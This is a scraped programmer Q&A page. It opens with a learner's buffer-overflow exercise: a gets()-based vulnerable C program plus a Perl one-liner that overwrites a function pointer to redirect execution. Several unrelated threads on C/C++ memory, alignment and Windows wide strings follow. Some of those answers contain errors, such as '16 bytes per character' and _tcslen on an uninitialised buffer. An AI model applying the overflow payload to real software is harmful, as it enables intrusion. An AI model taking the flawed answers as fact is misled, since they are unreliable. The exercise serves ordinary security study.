I am trying to learn more about cyber security, in this case about buffer overflows. I have a simple code that I want to change flow of:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
By using some tools I have determined that function pointer (fp) gets it value updated after 72 characters have entered the buffer. The function win() is located at value 0xe5894855 so after 72 characters I need to provide that value to buffer for it to jump to the desired function.
However I am facing this issue:
By putting Python3's print("A"*18*4 + "UH" + "\x89" + "\xe5") into input of given C code, I should be getting desired value 0xe5894855 in section marked with red. But instead, I am getting highlighted malformed hex from somewhere. (89 is getting extra C2 and incorrect e5 value is overflowing to next part of stack) (value in those parts of stack are zero initially, but changed into that once overflow is attempted).
Why is this happening? Am I putting hex values into C program incorrectly?
Edit: Still have not figured out why passing hex through python did not work, but I found a different method, by using Perl: perl -e 'print "A"x4x18 . "\x55\x48\x89\xe5"', which did work, and address I needed to jump to was also incorrect (which I also fixed)
Related
This is a header file that I'm getting the error on.
#include <vector>
#include <fstream>
#ifndef CRYPTO_H
#define CRYPTO_H
// given a char c return the encrypted character
char encrypt(char c);
// given a char c retun the decrypted character
char decrypt(char c);
// given a reference to an open file, return a vector with the # of characters, words, lines
std::vector<int> stats(std::ifstream& infile);
#endif
Please let me know what you think.
Thanks!!
I'm trying to display a simple message within my first MFC application.
Strangely, the first sample doesn't work, instead the second one works correctly.
auto text = std::to_wstring(1).c_str();
MessageBox(text, NULL, 0); // Not ok, the message is empty
auto temp = std::to_wstring(1);
MessageBox(temp.c_str(), NULL, 0); // Ok, display 1
Can you explain why of this behavior?
Yes, in the first example, the wstring created by the call to std::to_wstring only has the scope of the line. After the line executes, it is out of scope and its value is dubious.
In the second example, the wstring is still in scope and valid and so the call to .c_str() works.
No, the other answer is wrong. Look at the implementation of c_str(). c_str() returns basically a LPCWSTR... call it a const WCHAR* or const wchar_t* or whatever. However, the return of c_str() is to an internal pointer of wstring. The problem is that after the line of code executes, the wstring returned from to_wstring() is not valid and so the the pointer returned by c_str() is garbage. For fun, try the following code:
//cstr_.cpp
#include <iostream>
#include <string>
using namespace std;
int main(int argc, char* argv)
{
auto temp = to_wstring(1).c_str();
wprintf(L"%s\n", temp);
auto temp2 = to_wstring(1);
wprintf(L"%s\n", temp2.c_str());
wstring ws = to_wstring(1);
auto temp3 = ws.c_str();
wprintf(L"%s\n", temp3);
}
I compiled the above from a VC++ shell prompt with: cl.exe cstr.cpp
If the other answer is correct, then the last line should have garbage or nothing output because according to the other answer, c_str() is a temp. But, if my answer is correct, then it should output 1 (which it does). If all else fails, look at the implementation source code.
It seems that top level objects in gcc targeting x86 that are >= 32 bytes automatically get 32 byte alignment. This may be nice for performance, but I'm collecting an array of thingies from all my object files in a user-defined section, and the extra alignment gaps play havoc with this array. Is there any way to prevent this object alignment?
To clarify, I have a low-aligned struct, and different object files define
data in the form of an array of that struct in a user defined section, with
the purpose to make one application wide array.
As soon as one of those arrays is >= 32, the object alignment and with that the section alignment is pushed to 32 and when the linker concatenates the separate sections from the object files into the executable, it creates alignment fillers at the module boundaries in that section.
The following program illustrates a possible solution, assuming GCC
extensions are acceptable to you:
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#define ALIGNMENT // __attribute__ ((aligned (8)))
struct A {
char arr[40];
} ;
struct A a __attribute__ ((section ("my_data"))) ALIGNMENT = {{'a'}};
struct A b __attribute__ ((section ("my_data"))) ALIGNMENT = {{'b'}};
struct A c __attribute__ ((section ("my_data"))) ALIGNMENT = {{'c'}};
int main(int argc, char **argv)
{
assert(sizeof(struct A) == 40);
printf("%c\n",a.arr[0]);
printf("%c\n",b.arr[0]);
printf("%c\n",c.arr[0]);
printf("%lu\n",(unsigned long)(&a));
printf("%lu\n",(unsigned long)(&b));
printf("%lu\n",(unsigned long)(&c));
return 0;
}
My output is:
a
b
c
6295616
6295680
6295744
Note that in my (64-bit) executable each of the three 40-byte structures
is 64-byte aligned.
Now uncomment // __attribute__ ((aligned (8))), rebuild and rerun. My
output then is:
a
b
c
6295616
6295656
6295696
Now the structures are 8-byte aligned, without gaps.
What's wrong with this code when I compile it with -DPORTABLE?
#include <stdio.h>
#include <stdlib.h>
typedef struct {
unsigned char data[11];
#ifdef PORTABLE
unsigned long intv;
#else
unsigned char intv[4];
#endif
} struct1;
int main() {
struct1 s;
fprintf(stderr,"sizeof(s.data) = %d\n",sizeof(s.data));
fprintf(stderr,"sizeof(s.intv) = %d\n",sizeof(s.intv));
fprintf(stderr,"sizeof(s) = %d\n",sizeof(s));
return 0;
}
The output I get on 32 bit GCC:
$ gcc -o struct struct.c -DPORTABLE
$ ./struct
sizeof(s.data) = 11
sizeof(s.intv) = 4
sizeof(s) = 16
$ gcc -o struct struct.c
$ ./struct
sizeof(s.data) = 11
sizeof(s.intv) = 4
sizeof(s) = 15
Where did the extra byte came from?
I always thought 11+4 = 15 not 16.
Nothing's wrong with the code; those sizes are correct. The compiler may add padding to structs at its discretion. The size of a struct is only guaranteed to be large enough to hold its elements, so adding the sizes of its elements is not a reliable way to get the size of the struct.
Such padding can be helpful in keeping elements and the structs themselves aligned to specific boundaries, both to avoid alignment errors (perhaps why it's enabled with -DPORTABLE) and as a speed optimization, as Als points out.
This is due to structure padding.
Compilers are free to add extra padding bytes to structures to optimize the access time.
This is the reason You should always use sizeof operator and never manually calculate size of structures.
It's called alignment. That's especially added padding at end of structures to decrease cache misses. If you want to disable it, you can use something like that:
#pragma pack(push) /* push current alignment to stack */
#pragma pack(1) /* set alignment to 1 byte boundary */
typedef struct {
unsigned char data[11];
#ifdef PORTABLE
unsigned long intv;
#else
unsigned char intv[4];
#endif
} struct1;
#pragma pack(pop) /* restore original alignment from stack */
I'm trying to get some simple piece of code I found on a website to work in VC++ 2010 on windows vista 64:
#include "stdafx.h"
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
DWORD dResult;
BOOL result;
char oldWallPaper[MAX_PATH];
result = SystemParametersInfo(SPI_GETDESKWALLPAPER, sizeof(oldWallPaper)-1, oldWallPaper, 0);
fprintf(stderr, "Current desktop background is %s\n", oldWallPaper);
return 0;
}
it does compile, but when I run it, I always get this error:
Run-Time Check Failure #2 - Stack around the variable 'oldWallPaper' was corrupted.
I'm not sure what is going wrong, but I noticed, that the value of oldWallPaper looks something like "C\0:\0\0U\0s\0e\0r\0s[...]" -- I'm wondering where all the \0s come from.
A friend of mine compiled it on windows xp 32 (also VC++ 2010) and is able to run it without problems
any clues/hints/opinions?
thanks
The doc isn't very clear. The returned string is a WCHAR, two bytes per character not one, so you need to allocate twice as much space otherwise you get a buffer overrun. Try:
BOOL result;
WCHAR oldWallPaper[(MAX_PATH + 1)];
result = SystemParametersInfo(SPI_GETDESKWALLPAPER,
_tcslen(oldWallPaper), oldWallPaper, 0);
See also:
http://msdn.microsoft.com/en-us/library/ms724947(VS.85).aspx
http://msdn.microsoft.com/en-us/library/ms235631(VS.80).aspx (string conversion)
Every Windows function has 2 versions:
SystemParametersInfoA() // Ascii
SystemParametersInfoW() // Unicode
The version ending in W is the wide character type (ie Unicode) version of the function. All the \0's you are seeing are because every character you're getting back is in Unicode - 16 bytes per character - the second byte happens to be 0. So you need to store the result in a wchar_t array, and use wprintf instead of printf
wchar_t oldWallPaper[MAX_PATH];
result = SystemParametersInfo(SPI_GETDESKWALLPAPER, MAX_PATH-1, oldWallPaper, 0);
wprintf( L"Current desktop background is %s\n", oldWallPaper );
So you can use the A version SystemParametersInfoA() if you are hell-bent on not using Unicode. For the record you should always try to use Unicode, however.
Usually SystemParametersInfo() is a macro that evaluates to the W version, if UNICODE is defined on your system.